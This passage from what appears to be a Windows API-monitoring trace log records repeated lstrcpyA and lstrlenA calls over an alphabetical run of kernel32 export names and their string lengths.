lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.748] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.748] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.748] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.748] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.748] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.748] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.748] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.748] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.748] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.748] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.748] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.749] lstrlenA (lpString="BEEP") returned 4 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.749] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.749] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.749] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.749] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.749] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.749] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.749] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.749] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.749] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.749] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.749] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.749] lstrlenA (lpString="CANCELIO") returned 8 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.749] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.749] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.749] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.749] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.749] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.749] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.750] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.750] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.750] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.750] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.750] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.750] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.750] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.750] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.750] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.750] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.750] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.750] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.750] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.750] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.750] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.750] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.750] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.750] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.751] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.751] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.751] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.751] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.751] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.751] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.751] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.751] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.751] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.751] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.751] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.751] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.751] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.751] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.751] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.751] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.751] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.751] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.752] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.752] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.752] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.752] lstrlenA (lpString="COPYFILEA") returned 9 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.752] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.752] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.752] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.752] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.752] lstrlenA (lpString="COPYFILEW") returned 9 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.752] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.752] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.752] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.752] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.752] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.752] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.752] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.752] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.752] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.753] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.753] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.753] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.753] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.753] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.753] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.753] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.753] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.753] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.753] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.753] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.753] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.753] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.753] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.753] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.753] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.753] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.753] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.753] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.754] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.754] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.754] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.754] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.754] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.754] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.754] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.754] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.754] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.754] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.754] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.754] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.754] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.754] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.754] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.754] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.754] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.754] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.755] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.755] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.755] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.755] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.755] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.755] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.755] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.755] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, 